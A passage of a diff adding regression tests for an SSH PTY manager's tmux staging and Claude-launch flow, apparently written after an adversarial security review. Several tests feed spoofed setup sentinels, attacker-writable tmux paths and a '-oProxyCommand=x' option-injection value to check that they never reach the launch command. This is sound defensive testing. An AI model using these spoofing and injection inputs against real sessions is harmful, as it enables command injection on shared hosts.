+  // ROUND-2 MAJOR: two of the three properties this buffer is required to
+  // have (bounded size, cleared on teardown) were present in the code but
+  // asserted by NO test -- both survived the full suite when mutated. These
+  // two tests close that gap using the test-only length accessor.
+  //
+  // (a) Boundedness. Mutation to prove this can fail: neuter the cap in
+  // bufferSetupLine (e.g. `if (false && combined.length > ...)`) -- the
+  // buffer then grows to the full ~200KB fed below and this assertion fails.
+  it('bounds the setup-line buffer even when fed ~200KB of newline-free remote output', () => {
+    const sessionId = 's-i1-buffer-bounded'
+    driveHostSetupOnly(sessionId)
+    feedPtyData('y'.repeat(200_000)) // no \r/\n -- never resolves, just accumulates
+    const len = _getSetupLineBufferLenForTest(sessionId)
+    expect(len).toBeDefined()
+    expect(len!).toBeLessThanOrEqual(4096) // mirrors MAX_SETUP_LINE_BUFFER
+  })
+
+  // (b) Teardown. Mutation to prove this can fail: remove the
+  // `clearSetupLineBuffer(sessionId)` call from cleanupSessionResources --
+  // the accessor then still returns a defined length after killPty below.
+  it('clears the setup-line buffer on teardown (killPty -> cleanupSessionResources)', () => {
+    const sessionId = 's-i1-buffer-teardown'
+    driveHostSetupOnly(sessionId)
+    const nonce = _getSshNonceForTest(sessionId)!
+    feedPtyData(`setup ok ${nonce} tmux=pa`) // partial line -- buffer is populated, unresolved
+    expect(_getSetupLineBufferLenForTest(sessionId)).toBeDefined()
+    killPty(sessionId)
+    expect(_getSetupLineBufferLenForTest(sessionId)).toBeUndefined()
+  })
+})
+
+// #242 finding F1, BLOCKER (adversarial review round 5). Demonstrated attack:
+// "feeding a line shaped like a wall broadcast made CCC write
+// /tmp/.x/tmux new-session -A -s ccc-victim1 '...claude...' into the
+// victim's shell" and "a bare relative name ('setup ok tmux=tmux') also
+// works". These drive the REAL flow (spawnPty -> launchClaude -> feed
+// bytes), not the pure builders, because the vulnerability is in what the
+// flow ACCEPTS from the wire.
+describe('spawnPty SSH branch — F1 spoofed-sentinel regressions (#242 BLOCKER)', () => {
+  beforeEach(() => {
+    vi.useFakeTimers()
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+  })
+
+  // #242 finding I2 correction: pre-fix, the OUTER setupDone latch was a
+  // bare `data.includes('setup ok')` substring check, independent of the
+  // nonce -- so a spoofed sentinel with NO nonce at all still flipped
+  // setupDone (just left detectedTmuxPath untouched), forcing an unwanted
+  // tier-3 staging attempt on a host that might already have had tmux. Now
+  // the completion latch itself is gated on the SAME nonce-bearing match
+  // the tmux-class read uses, so a no-nonce spoof does not complete setup
+  // AT ALL from this data -- there is nothing for it to force. Mutation to
+  // prove this can fail: revert the setupDone latch to a bare substring
+  // check (its pre-fix shape) -- setupDone would flip on this chunk alone
+  // and the assertion below (still pending, no write yet) would fail.
+  it('a spoofed "setup ok tmux=path" carrying NO nonce does not latch setup completion at all', () => {
+    onDataListeners.length = 0
+    spawnPty(fakeWin, 's-f1-no-nonce', { ssh: SSH } as never)
+    writeMock.mockClear()
+    getSshFlow('s-f1-no-nonce')!.launchClaude()
+    vi.advanceTimersByTime(300)
+    // No {NONCE} placeholder -- fed completely verbatim, exactly the shape
+    // a co-tenant's wall/write broadcast (or any other PTY writer) would
+    // produce with no knowledge of this session's real nonce.
+    feedPtyData('setup ok tmux=path\r\n')
+    vi.advanceTimersByTime(1500)
+    vi.advanceTimersByTime(300)
+    expect(writeMock.mock.calls.some((c) => typeof c[0] === 'string' && c[0].includes('claude '))).toBe(false)
+    // The real sentinel arriving afterward still completes setup normally --
+    // the spoof did not poison or consume the buffer.
+    feedPtyData(nonceSentinel('s-f1-no-nonce', 'setup ok {NONCE} tmux=path\r\n'))
+    vi.advanceTimersByTime(1500)
+    vi.advanceTimersByTime(300)
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    expect((claudeWrite![0] as string)).toContain(ON_PATH_TMUX_BIN_EXPR)
+  })
+
+  // The second documented variant: a WRONG nonce, applies to EVERY SSH
+  // session, no tmux-less host required, since it targets the tier-1/2
+  // window directly. Same I2 correction as above -- a wrong-nonce sentinel
+  // no longer completes setup either, even claiming the maximal `tmux=path`
+  // class.
+  it('a spoofed sentinel with the WRONG nonce does not latch setup completion either, even claiming tmux=path', () => {
+    onDataListeners.length = 0
+    spawnPty(fakeWin, 's-f1-wrong-nonce', { ssh: SSH } as never)
+    writeMock.mockClear()
+    getSshFlow('s-f1-wrong-nonce')!.launchClaude()
+    vi.advanceTimersByTime(300)
+    feedPtyData('setup ok wrongnonceabc123 tmux=path\r\n')
+    vi.advanceTimersByTime(1500)
+    vi.advanceTimersByTime(300)
+    expect(writeMock.mock.calls.some((c) => typeof c[0] === 'string' && c[0].includes('claude '))).toBe(false)
+    feedPtyData(nonceSentinel('s-f1-wrong-nonce', 'setup ok {NONCE} tmux=home\r\n'))
+    vi.advanceTimersByTime(1500)
+    vi.advanceTimersByTime(300)
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    // Genuine result was tmux=home (staged location) -- the spoofed
+    // tmux=path (which would have selected ON_PATH_TMUX_BIN_EXPR instead)
+    // never took effect.
+    expect((claudeWrite![0] as string)).toContain(STAGED_TMUX_BIN_EXPR)
+    expect((claudeWrite![0] as string)).not.toContain(ON_PATH_TMUX_BIN_EXPR)
+  })
+
+  // #242 finding F1(a), round-2 correction, BLOCKER. The round-2 reviewer's
+  // exact demonstrated regression: an "ends with /.claude/bin/tmux" check
+  // (the pre-round-2 approach) is satisfiable from an attacker-writable
+  // directory -- `mkdir -p /tmp/.claude/bin` succeeds for any co-tenant, so
+  // BOTH `/tmp/.claude/bin/tmux` and the double-slash
+  // `/tmp/x//.claude/bin/tmux` satisfy that suffix test while pointing at
+  // attacker-controlled bytes, WITH a genuinely valid nonce. `/tmp/.x/tmux`
+  // (which fails even the old ends-with check) is included too, so this one
+  // test covers the full spectrum the reviewer named. Mutation to prove
+  // this can fail: revert buildTmuxLaunchCommand's staged branch to read
+  // `input.tmuxBin` (the round-2-rejected shape) instead of always emitting
+  // STAGED_TMUX_BIN_EXPR -- every `not.toContain` below then fails, because
+  // the reported attacker path reaches the written command.
+  it('a spoofed stage-ok reporting a path outside the real $HOME/.claude/bin -- including one satisfying an "ends with" test from an attacker-writable dir -- never reaches the launch command, even WITH a valid nonce', () => {
+    for (const hostilePath of ['/tmp/.x/tmux', '/tmp/.claude/bin/tmux', '/tmp/x//.claude/bin/tmux']) {
+      const sessionId = `s-f1-outside-claudebin-${hostilePath.replace(/[^a-z0-9]/gi, '')}`
+      driveToStageWrite(sessionId)
+      writeMock.mockClear()
+      feedPtyData(nonceSentinel(sessionId, `ccc-tmux-stage {NONCE} ok path=${hostilePath}\r\n`))
+      vi.advanceTimersByTime(300)
+      const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+      expect(claudeWrite).toBeDefined()
+      const written = claudeWrite![0] as string
+      // Staging still genuinely succeeded (a real binary really was
+      // installed) -- the launch IS tmux-wrapped, just never with the
+      // attacker-reported operand.
+      expect(written).toMatch(/new-session\s+-A\s+-s/)
+      expect(written).not.toContain(hostilePath)
+      expect(written).toContain('"$HOME"/.claude/bin/tmux new-session -A')
+    }
+  })
+
+  // The genuine, nonce-carrying sentinel must still work end to end --
+  // otherwise the fix would have closed the hole by breaking the feature.
+  it('the genuine nonce-carrying tier-1/2 sentinel still wraps claude in tmux end to end', () => {
+    driveToClaudeWrite('s-f1-genuine-tier12', 'setup ok {NONCE} tmux=path\r\n')
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    expect((claudeWrite![0] as string)).toContain(`${ON_PATH_TMUX_BIN_EXPR} new-session -A -s ccc-s-f1-genuine-tier12`)
+  })
+
+  it('the genuine nonce-carrying tier-3 staged-ok sentinel still wraps claude in tmux end to end', () => {
+    driveToStageWrite('s-f1-genuine-tier3')
+    writeMock.mockClear()
+    feedPtyData(nonceSentinel('s-f1-genuine-tier3', 'ccc-tmux-stage {NONCE} ok path=/home/dev/.claude/bin/tmux\r\n'))
+    vi.advanceTimersByTime(300)
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    // #242 finding F1(a), round-2 correction: the launch always embeds the
+    // fixed $HOME expression for a staged tier, never the reported path --
+    // see STAGED_TMUX_BIN_EXPR (ssh-tmux.ts).
+    expect((claudeWrite![0] as string)).toContain('"$HOME"/.claude/bin/tmux new-session -A -s ccc-s-f1-genuine-tier3')
+  })
+})
+
+// Direct unit coverage of parseTmuxSentinel's three-way discrimination
+// (adversarial review, #242 MINOR): the old `parseTmuxSentinel(data) ??
+// detectedTmuxPath` call sites could not tell "no sentinel field in this
+// chunk" apart from "field explicitly said none", so a later `none` could
+// not clear an earlier detected path.
+// #242 tier 3 call-site guard. Mirrors the driveToClaudeWrite helper above:
+// when tier 1/2 report tmux=none, the flow must run the curl/wget staging
+// fragment BEFORE writeClaudeCmd -- not skip straight to the bare launch --
+// and must still reach writeClaudeCmd afterward regardless of how staging
+// turns out.
+// #242 I1 ROUND-3. The first cut of the split-chunk buffer covered only the two
+// setup-ok latches, leaving the tier-3/4 stage sentinel and the tier-4 arch
+// probe parsing the raw chunk -- so the bug stayed live on exactly the tiers a
+// tmux-less remote depends on, which is what a desktop test against a real
+// remote exercises. Each of these fails when its call site is reverted to parse
+// `data` instead of the accumulated buffer.
+describe('#242 I1: tier-3/4 sentinels split across PTY chunks', () => {
+  beforeEach(() => {
+    vi.useFakeTimers()
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+  })
+
+  it('still wraps in tmux when a stage ok path= sentinel is split across two chunks', () => {
+    const sessionId = 's-i1-stage-ok-split'
+    driveToStageWrite(sessionId)
+    const whole = nonceSentinel(sessionId, 'ccc-tmux-stage {NONCE} ok path=/home/dev/.claude/bin/tmux\r\n')
+    const cut = whole.indexOf('path=') + 'path=/home/dev/.claude/bin/'.length
+    feedPtyData(whole.slice(0, cut))
+    feedPtyData(whole.slice(cut))
+    vi.advanceTimersByTime(300) // writeClaudeCmd's own 200ms write delay
+    const claudeWrite = writeMock.mock.calls
+      .map((c) => (typeof c[0] === 'string' ? c[0] : ''))
+      .find((s) => s.includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    // Staged tier never trusts the reported path -- it launches the host-side
+    // literal expression. The point here is that it WRAPS at all.
+    expect(claudeWrite).toContain(`${STAGED_TMUX_BIN_EXPR} new-session -A -s ccc-${sessionId}`)
+  })
+
+  it('reaches the bare launch promptly when a stage fail= sentinel is split across two chunks', () => {
+    const sessionId = 's-i1-stage-fail-split'
+    driveToStageWrite(sessionId)
+    const whole = nonceSentinel(sessionId, 'ccc-tmux-stage {NONCE} fail=terminfo\r\n')
+    const cut = whole.indexOf('fail=') + 'fail=ter'.length
+    feedPtyData(whole.slice(0, cut))
+    feedPtyData(whole.slice(cut))
+    vi.advanceTimersByTime(300)
+    const claudeWrite = writeMock.mock.calls
+      .map((c) => (typeof c[0] === 'string' ? c[0] : ''))
+      .find((s) => s.includes('claude '))
+    // Without buffering this only arrives via the 20s STAGE_TIMEOUT, so the
+    // 300ms advance above is the assertion: it resolved from the sentinel.
+    expect(claudeWrite).toBeDefined()
+    expect(claudeWrite).not.toContain('new-session -A')
+  })
+
+  it('still reaches tier 4 when the arch probe is split across two chunks', async () => {
+    const sessionId = 's-i1-arch-split'
+    _setTmuxArchiveResolverForTest(async () => FAKE_TMUX_ARCHIVE)
+    try {
+      driveToStageWrite(sessionId)
+      // Arch probe split mid-token: without buffering detectedArch stays null
+      // and the later fail=download can never hand off to attemptTmuxPush, so
+      // tier 4 is unreachable on any link that segments the line.
+      feedPtyData('ccc-tmux-push-arch Linux-x86')
+      feedPtyData('_64\r\n')
+      feedPtyData(nonceSentinel(sessionId, 'ccc-tmux-stage {NONCE} fail=download\r\n'))
+      await flushMicrotasks()
+      expect(pushActivityDetected()).toBe(true)
+    } finally {
+      _setTmuxArchiveResolverForTest(null)
+    }
+  })
+
+  it('drops the stage and arch buffers on teardown', () => {
+    const sessionId = 's-i1-buffers-teardown'
+    driveToStageWrite(sessionId)
+    feedPtyData('ccc-tmux-push-arch Linux-x86') // partial: stays buffered
+    expect(_getSetupLineBufferLenForTest(sessionId, 'arch')).toBeGreaterThan(0)
+    killPty(sessionId)
+    expect(_getSetupLineBufferLenForTest(sessionId, 'arch')).toBeUndefined()
+    expect(_getSetupLineBufferLenForTest(sessionId, 'stage')).toBeUndefined()
+  })
+})
+
+function driveToStageWrite(sessionId: string): void {
+  onDataListeners.length = 0
+  spawnPty(fakeWin, sessionId, { ssh: SSH } as never)
+  writeMock.mockClear()
+  getSshFlow(sessionId)!.launchClaude()
+  vi.advanceTimersByTime(300) // past writeHostSetupCmd's 200ms setup write
+  feedPtyData(nonceSentinel(sessionId, 'setup ok {NONCE} tmux=none\r\n'))
+  vi.advanceTimersByTime(1500) // idle fallback: setupDone -> proceedAfterSetup -> writeTmuxStageCmd scheduled
+  vi.advanceTimersByTime(300) // writeTmuxStageCmd's own 200ms write delay
+}
+
+describe('spawnPty SSH branch — tmux tier-3 staging call site (#242)', () => {
+  beforeEach(() => {
+    vi.useFakeTimers()
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+  })
+
+  // Acceptance: "fails when the flow stops writing the stage command on a
+  // `setup ok tmux=none` remote". Reverting proceedAfterSetup to call
+  // writeClaudeCmd() directly (skipping writeTmuxStageCmd) makes this fail:
+  // the first write would be the bare claude command instead of the
+  // staging fragment.
+  it('writes the curl/wget staging fragment before claude when tier 1/2 report tmux=none', () => {
+    driveToStageWrite('s-stage-run')
+    const stageWrite = writeMock.mock.calls.find((c) => isStagingWrite(c[0]))
+    expect(stageWrite).toBeDefined()
+    const written = stageWrite![0] as string
+    // #242 round-3 MAJOR fix: the outgoing write is base64-wrapped, so
+    // 'uname -s'/'sha256sum -c' no longer appear in the written text
+    // directly -- assert the wrapper shape instead, and decode the payload
+    // to confirm it really does carry the staging script.
+    expect(written).toMatch(/^stty -echo 2>\/dev\/null; echo '[A-Za-z0-9+\/=]+' \| base64 -d \| sh; stty echo 2>\/dev\/null\r?$/)
+    const b64 = written.match(/echo '([A-Za-z0-9+\/=]+)'/)![1]
+    const decoded = Buffer.from(b64, 'base64').toString('utf8')
+    expect(decoded).toContain('uname -s')
+    expect(decoded).toContain('sha256sum -c')
+    // Nothing claude-shaped has been written yet -- staging is still
+    // in flight, awaiting its own sentinel.
+    expect(writeMock.mock.calls.some((c) => typeof c[0] === 'string' && c[0].includes('claude '))).toBe(false)
+  })
+
+  it('does NOT stage when tier 1/2 already found a tmux binary', () => {
+    onDataListeners.length = 0
+    spawnPty(fakeWin, 's-stage-skip', { ssh: SSH } as never)
+    writeMock.mockClear()
+    getSshFlow('s-stage-skip')!.launchClaude()
+    vi.advanceTimersByTime(300)
+    feedPtyData(nonceSentinel('s-stage-skip', 'setup ok {NONCE} tmux=path\r\n'))
+    vi.advanceTimersByTime(1500)
+    vi.advanceTimersByTime(300)
+    expect(writeMock.mock.calls.some((c) => isStagingWrite(c[0]))).toBe(false)
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    expect((claudeWrite![0] as string)).toContain('new-session -A -s ccc-s-stage-skip')
+  })
+
+  // Acceptance: "fails when a `ccc-tmux-stage fail=terminfo` chunk no
+  // longer produces an unwrapped claudeCmd launch". If the stage-sentinel
+  // handler stopped calling writeClaudeCmd on failure (or wrongly set
+  // detectedTmuxPath), the claude write would either never happen or come
+  // out tmux-wrapped.
+  it('falls through to the unwrapped claude launch on ccc-tmux-stage fail=terminfo', () => {
+    driveToStageWrite('s-stage-fail')
+    writeMock.mockClear()
+    feedPtyData(nonceSentinel('s-stage-fail', 'ccc-tmux-stage {NONCE} fail=terminfo\r\n'))
+    vi.advanceTimersByTime(300) // writeClaudeCmd's own 200ms write delay
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    const written = claudeWrite![0] as string
+    expect(written).not.toMatch(/new-session\s+-A\s+-s/)
+    expect(written).toContain('claude ')
+  })
+
+  it('wraps the eventual claude launch in tmux when staging reports ok path=...', () => {
+    driveToStageWrite('s-stage-ok')
+    writeMock.mockClear()
+    feedPtyData(nonceSentinel('s-stage-ok', 'ccc-tmux-stage {NONCE} ok path=/home/dev/.claude/bin/tmux\r\n'))
+    vi.advanceTimersByTime(300)
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    const written = claudeWrite![0] as string
+    // #242 finding F1(a), round-2 correction: the reported path is never
+    // used to build the launch -- see STAGED_TMUX_BIN_EXPR (ssh-tmux.ts).
+    expect(written).toContain('"$HOME"/.claude/bin/tmux new-session -A -s ccc-s-stage-ok')
+    expect(written).not.toContain('/home/dev/.claude/bin/tmux new-session')
+  })
+
+  // A hostile/unsafe path in the staging "ok" line must degrade to the
+  // bare launch exactly like the tier-1/2 hostile-path tests above --
+  // parseTmuxStageSentinel re-applies isSafeTmuxBin rather than trusting
+  // raw remote output.
+  it('falls through to the unwrapped launch when the staged ok path fails the tmuxBin allowlist', () => {
+    driveToStageWrite('s-stage-hostile')
+    writeMock.mockClear()
+    feedPtyData(nonceSentinel('s-stage-hostile', 'ccc-tmux-stage {NONCE} ok path=-oProxyCommand=x\r\n'))
+    vi.advanceTimersByTime(300)
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    const written = claudeWrite![0] as string
+    expect(written).not.toMatch(/new-session\s+-A\s+-s/)
+    expect(written).not.toContain('-oProxyCommand')
+  })
+
+  it('falls through to the bare launch if the stage sentinel never arrives (timeout)', () => {
+    driveToStageWrite('s-stage-timeout')
+    writeMock.mockClear()
+    vi.advanceTimersByTime(20000) // STAGE_TIMEOUT_MS
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    const written = claudeWrite![0] as string
+    expect(written).not.toMatch(/new-session\s+-A\s+-s/)
+  })
+
+  // #242 finding F3 (adversarial review round 4, MAJOR): stagingTimeoutHandle
+  // was armed by writeTmuxStageCmd but never cleared by
+  // flowController.destroy() -- it outlives session teardown and, 20s later,
+  // drives a full claude-launch write into the PTY destroy() just tore down
+  // (the exact invariant destroy() exists to enforce; setupTimeoutHandle and
+  // idleFallbackHandle were already cleared there, stagingTimeoutHandle was
+  // not).
+  //
+  // The invariant is now defended TWICE -- destroy() clears the timer AND sets a
+  // `destroyed` flag that writeClaudeCmd/writeTmuxStageCmd bail on -- so no single
+  // mutation fails this test. Verified: removing only the clearTimeout block leaves
+  // it GREEN (the flag still catches the write); removing the `destroyed` check in
+  // writeClaudeCmd as well is what makes it fail. Both guards are deliberate: the
+  // clear stops the timer, the flag stops any write that outruns it.
+  //
+  // Recorded precisely because an earlier revision of this comment claimed the
+  // single-mutation version fails, and it does not. A comment asserting a mutation
+  // sensitivity the test does not have is the same defect class as a test that
+  // cannot fail -- someone later trusts it instead of re-running it (#241).
+  it('clears the staging timer on destroy() so a leaked timer never writes into a killed PTY', () => {
+    driveToStageWrite('s-stage-destroy')
+    const writesBeforeDestroy = writeMock.mock.calls.length
+    getSshFlow('s-stage-destroy')!.destroy()
+    vi.advanceTimersByTime(20300) // STAGE_TIMEOUT_MS + writeClaudeCmd's own 200ms write delay
+    expect(writeMock.mock.calls.length).toBe(writesBeforeDestroy)
+  })
+
+  it('attempts staging only once per session even if the setup-completion path fires again', () => {
+    driveToStageWrite('s-stage-once')
+    const stageWritesBefore = writeMock.mock.calls.filter((c) => isStagingWrite(c[0])).length
+    expect(stageWritesBefore).toBe(1)
+    // Resolve staging (fail) and drive claude write; no SECOND staging
+    // attempt should ever occur regardless of subsequent PTY chatter.
+    feedPtyData(nonceSentinel('s-stage-once', 'ccc-tmux-stage {NONCE} fail=download\r\n'))
+    vi.advanceTimersByTime(300)
+    feedPtyData(nonceSentinel('s-stage-once', 'setup ok {NONCE} tmux=none\r\n')) // stray echo of an earlier sentinel, should not retrigger anything
+    vi.advanceTimersByTime(1500)
+    const stageWritesAfter = writeMock.mock.calls.filter((c) => isStagingWrite(c[0])).length
+    expect(stageWritesAfter).toBe(1)
+  })
+
+  // Adversarial review round 2, MAJOR (routing half, isolated from the
+  // staging-in-flight guard tested below): a Launch-Claude click that lands
+  // on the `setupDone` branch -- i.e. setup JUST completed (setupDone flips
+  // synchronously in onData) but the 1.5s idle-fallback hasn't fired yet --
+  // must go through proceedAfterSetup, not straight to writeClaudeCmd. At
+  // the moment of THIS click, stagingSent is still false, so the
+  // staging-in-flight guard cannot be what saves it -- only the routing fix
+  // can. Reverting `proceedAfterSetup()` back to `writeClaudeCmd()` on this
+  // branch makes the second click skip staging and write the bare claude
+  // command immediately, even though tier 1/2 just reported tmux=none.
+  it('a Launch-Claude click landing on the just-completed setupDone branch still routes through staging, not straight to writeClaudeCmd', () => {
+    onDataListeners.length = 0
+    spawnPty(fakeWin, 's-stage-setupdone-click', { ssh: SSH } as never)
+    writeMock.mockClear()
+    getSshFlow('s-stage-setupdone-click')!.launchClaude()
+    vi.advanceTimersByTime(300) // past writeHostSetupCmd's 200ms setup write
+    feedPtyData(nonceSentinel('s-stage-setupdone-click', 'setup ok {NONCE} tmux=none\r\n')) // setupDone flips synchronously here
+    // Second click BEFORE the 1.5s idle-fallback has a chance to fire.
+    getSshFlow('s-stage-setupdone-click')!.launchClaude()
+    vi.advanceTimersByTime(300) // writeTmuxStageCmd's own 200ms write delay
+    const stageWrite = writeMock.mock.calls.find((c) => isStagingWrite(c[0]))
+    expect(stageWrite).toBeDefined()
+    expect(writeMock.mock.calls.some((c) => typeof c[0] === 'string' && c[0].includes('claude '))).toBe(false)
+  })
+
+  // Adversarial review round 2, MAJOR: pre-#242 the setupDone branch of
+  // launchClaude() called writeClaudeCmd() directly, which was effectively
+  // inert because claudeSent flipped true in the SAME tick setup completed.
+  // Tier-3 staging opens a window (up to STAGE_TIMEOUT_MS) where claudeSent
+  // is still false while a curl/wget fragment is in flight on the remote --
+  // a second Launch-Claude click in that window must not write a second
+  // staging attempt OR a premature claude command that races the in-flight
+  // download. Reverting either the launchClaude guard or the
+  // writeClaudeCmd-direct→proceedAfterSetup fix makes this fail.
+  it('a second Launch-Claude click while staging is in flight writes nothing until the stage sentinel resolves', () => {
+    driveToStageWrite('s-stage-race')
+    const writesWhileStaging = writeMock.mock.calls.length
+    getSshFlow('s-stage-race')!.launchClaude()
+    vi.advanceTimersByTime(300)
+    expect(writeMock.mock.calls.length).toBe(writesWhileStaging)
+    expect(writeMock.mock.calls.some((c) => isStagingWrite(c[0]))).toBe(true) // still just the one from driveToStageWrite
+    const stageWriteCount = writeMock.mock.calls.filter((c) => isStagingWrite(c[0])).length
+    expect(stageWriteCount).toBe(1)
+    expect(writeMock.mock.calls.some((c) => typeof c[0] === 'string' && c[0].includes('claude '))).toBe(false)
+    // Resolve staging; the claude write proceeds exactly once, normally --
+    // the earlier click did not queue up a duplicate.
+    feedPtyData(nonceSentinel('s-stage-race', 'ccc-tmux-stage {NONCE} fail=download\r\n'))
+    vi.advanceTimersByTime(300)
+    const claudeWrites = writeMock.mock.calls.filter((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrites).toHaveLength(1)
+  })
+
+  // Adversarial review round 2, MINOR: the staging-failure branch used to
+  // call setFlowState('running-setup', `tmux-stage-fail:<reason>`) and then
+  // immediately call writeClaudeCmd(), whose own setFlowState('running-claude')
+  // fired in the SAME tick and overwrote it -- a renderer painting only
+  // current state never saw the reason. The reason must survive onto the
+  // state actually observable via getState() (mirrors what a renderer's
+  // flow-state listener would see).
+  it('carries the tmux-stage-fail reason forward onto the running-claude state instead of it being overwritten', () => {
+    driveToStageWrite('s-stage-info')
+    feedPtyData(nonceSentinel('s-stage-info', 'ccc-tmux-stage {NONCE} fail=terminfo\r\n'))
+    vi.advanceTimersByTime(300)
+    expect(getSshFlow('s-stage-info')!.getState()).toEqual({
+      state: 'running-claude',
+      info: 'tmux-stage-fail:terminfo',
+    })
+  })
+
+  // M5 (adversarial review round 5, half-closed until round 2). The throw
+  // out of buildTmuxStageCommand/assertSafeTmuxStageConstants was already
+  // tested directly (ssh-tmux-stage.test.ts), but the CLEAN FALLBACK at
+  // THIS call site -- the try/catch that sets stagingDone and calls
+  // writeClaudeCmd('tmux-stage-fail:build-error') -- was not. That catch is
+  // what stands between a constant-shape regression and a session that
+  // never launches claude at all. TMUX_STAGE_SHA256 is declared `const` but
+  // is a plain object -- `const` only freezes the BINDING, not its
+  // contents -- so mutating one entry and restoring it in `finally` is a
+  // legitimate way to exercise the real call site without touching source.
+  //
+  // Mutation to prove this can fail: remove the try/catch around the
+  // `buildTmuxStageCommand(sshNonce)` call in pty-manager.ts (or drop its
+  // `writeClaudeCmd('tmux-stage-fail:build-error')`) -- the corrupted
+  // constant then throws OUT of the bare setTimeout callback, which the
+  // global uncaughtException handler re-throws (killing main in production;
+  // surfacing as an unhandled error / failed assertion here), and no claude
+  // write ever lands.
+  it('falls through to the bare claude launch and carries tmux-stage-fail:build-error when a TMUX_STAGE_SHA256 entry is corrupted', () => {
+    const original = TMUX_STAGE_SHA256['linux-x86_64']
+    TMUX_STAGE_SHA256['linux-x86_64'] = 'not-a-real-digest'
+    try {
+      driveToStageWrite('s-m5-build-error')
+      vi.advanceTimersByTime(300) // writeClaudeCmd's own 200ms write delay
+      const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+      expect(claudeWrite).toBeDefined()
+      const written = claudeWrite![0] as string
+      expect(written).not.toMatch(/new-session\s+-A\s+-s/)
+      expect(getSshFlow('s-m5-build-error')!.getState()).toEqual({
+        state: 'running-claude',
+        info: 'tmux-stage-fail:build-error',
+      })
+    } finally {
+      TMUX_STAGE_SHA256['linux-x86_64'] = original
+    }
+  })
+})
+
+// #242 finding F3 (MAJOR, adversarial review round 5): after a stage/push
+// `ok` sentinel resolves, pty-manager must patch the ALREADY-WRITTEN
+// settings-<safeSid>.json's CCC_TMUX_BIN before the claude launch write --
+// see buildTmuxBinPatchCommand's doc comment (ssh-shim.ts) for the full
+// mechanism. Drives stage-ok and asserts the patch computes a NON-EMPTY
+// CCC_TMUX_BIN reaches the wire, not merely that SOME patch write happened.
+//
+// #242 finding F1(a), round-2 correction: the patch script no longer
+// receives the reported path from the host at all -- it computes
+// `path.join(os.homedir(),'.claude','bin','tmux')` itself, evaluated on the
+// REMOTE at runtime -- so these assertions look for that computation
+// EXPRESSION in the decoded script, not a literal reported-path string
+// (which would no longer appear even for a perfectly legitimate stage-ok).
+function decodedPatchScript(call: unknown): string | undefined {
+  if (typeof call !== 'string' || !call.startsWith('echo \'')) return undefined
+  const m = call.match(/^echo '([A-Za-z0-9+\/=]+)' \| base64 -d \| node/)
+  if (!m) return undefined
+  return Buffer.from(m[1], 'base64').toString('utf8')
+}
+function isTmuxBinPatchWrite(call: unknown): boolean {
+  const decoded = decodedPatchScript(call)
+  return decoded !== undefined
+    && decoded.includes("path.join(os.homedir(),'.claude','bin','tmux')")
+    && decoded.includes('CCC_TMUX_BIN=')
+}
+describe('spawnPty SSH branch — CCC_TMUX_BIN settings patch after stage/push ok (#242 finding F3)', () => {
+  beforeEach(() => {
+    vi.useFakeTimers()
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+  })
+
+  // Mutation to prove this can fail: remove the buildTmuxBinPatchCommand
+  // write from the stage-ok branch in pty-manager.ts -- no write in this
+  // session matches isTmuxBinPatchWrite (the only settings write remains
+  // the host-setup one, which bakes in the EMPTY tier-1/2 result).
+  it('sends a settings patch that computes a NON-EMPTY CCC_TMUX_BIN remotely, after tier-3 stage-ok, BEFORE the claude write -- even when the reported path is attacker-controlled', () => {
+    driveToStageWrite('s-f3-stage-patch')
+    writeMock.mockClear()
+    // Deliberately a hostile reported path (F1(a) round-2 correction): the
+    // patch must still compute the FIXED remote location, never this value.
+    feedPtyData(nonceSentinel('s-f3-stage-patch', 'ccc-tmux-stage {NONCE} ok path=/tmp/.claude/bin/tmux\r\n'))
+    vi.advanceTimersByTime(300)
+    const patchWriteIdx = writeMock.mock.calls.findIndex((c) => isTmuxBinPatchWrite(c[0]))
+    expect(patchWriteIdx).toBeGreaterThan(-1)
+    expect(decodedPatchScript(writeMock.mock.calls[patchWriteIdx][0])).not.toContain('/tmp/.claude/bin/tmux')
+    const claudeWriteIdx = writeMock.mock.calls.findIndex((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWriteIdx).toBeGreaterThan(-1)
+    expect(patchWriteIdx).toBeLessThan(claudeWriteIdx)
+  })
+
+  it('sends a settings patch that computes a NON-EMPTY CCC_TMUX_BIN remotely, after tier-4 push-ok, BEFORE the claude write', async () => {
+    _setTmuxArchiveResolverForTest(async () => FAKE_TMUX_ARCHIVE)
+    try {
+      driveToPushAttempt('s-f3-push-patch')
+      await flushMicrotasks()
+      await vi.advanceTimersByTimeAsync(5000)
+      feedPtyData(nonceSentinel('s-f3-push-patch', 'ccc-tmux-stage {NONCE} ok path=/home/dev/.claude/bin/tmux\r\n'))
+      await vi.advanceTimersByTimeAsync(300)
